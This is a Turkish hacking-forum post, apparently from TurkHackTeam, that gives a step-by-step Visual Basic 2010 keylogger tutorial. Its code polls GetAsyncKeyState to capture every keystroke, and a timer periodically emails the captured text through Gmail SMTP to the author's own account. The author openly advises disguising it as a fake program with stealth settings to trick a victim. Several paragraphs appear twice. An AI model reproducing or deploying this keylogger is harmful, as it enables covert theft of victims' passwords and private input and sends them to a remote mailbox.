Merhaba Arkadaşlar Öncelikle Konu Daha Önce Açıldımı Bilmiyorum.
Anlatım tamamen bana aittir şmidi ilk olarak Formumumza 2 adet timer ve 1 adet text box veya rich text box fark etmez ben richtextbox kullandım.
çalışma prensibi nedir:
1.timerımız basılan her tuşu 1milisaniyede textbozumuzun içine atacak 2. timerımızsa belirli aralıklarla textboxımızın içindekileri emailimize yolluyacak gelelim kodlara
Timer1
Yani Tuşları TextBoxa Atıcak Olan Timerımız
Şimdide Email yolluyacak timerımızın kodları gerekli yerleri kendinize göre doldurun
(timerın adını email yaptım)
Kodlarımız Bu kadar ister bunu bir fake programda kullanın isterseniz formda çeşitli gizlilik özelliklerini vererek kurbana yutturun bu piyasada görebileceğiniz en basti keylogger yapım şeklidir
Edit: Teşekkür fazla olursa Fake Program yapımını ve çeşitli programların yapımını paylaşacığım uzmanlık alanım Visual Basic2010 İnternette yeteri kadar 2010 anlatımı olmadığını düşündüğüm için yaptığım her programı siznle paylaşacağım ve nasıl yapıldığını aşama aşama anlatacağım iyi Forumlar...
Anlatım tamamen bana aittir şmidi ilk olarak Formumumza 2 adet timer ve 1 adet text box veya rich text box fark etmez ben richtextbox kullandım.
çalışma prensibi nedir:
1.timerımız basılan her tuşu 1milisaniyede textbozumuzun içine atacak 2. timerımızsa belirli aralıklarla textboxımızın içindekileri emailimize yolluyacak gelelim kodlara
Timer1
Yani Tuşları TextBoxa Atıcak Olan Timerımız
Kod:
Private Sub Timer1_Tick(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Timer1.Tick
For i = 1 To 255
result = 0
result = (GetAsyncKeyState(i))
If result = -32767 Then
RichTextBox1.Text = RichTextBox1.Text + Chr(i)
End If
Next i
End Sub
(timerın adını email yaptım)
Kod:
Private Sub email_Tick(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles email.Tick
Dim MymailMassege As New MailMessage()
MymailMassege.From = New MailAddress("gmailiniz")
MymailMassege.To.Add("gmailiniz")
MymailMassege.Subject = ("NewSubject@TurkHackTeam")
MymailMassege.Body = RichTextBox1.Text
Dim SMTPServer As New SmtpClient("smtp.gmail.com")
SMTPServer.Port = 587
SMTPServer.Credentials = New System.Net.NetworkCredential("Gmail adresiniz", "şifreniz")
SMTPServer.EnableSsl = True
SMTPServer.Send(MymailMassege)
RichTextBox1.Text = ("")
End Sub
Edit: Teşekkür fazla olursa Fake Program yapımını ve çeşitli programların yapımını paylaşacığım uzmanlık alanım Visual Basic2010 İnternette yeteri kadar 2010 anlatımı olmadığını düşündüğüm için yaptığım her programı siznle paylaşacağım ve nasıl yapıldığını aşama aşama anlatacağım iyi Forumlar...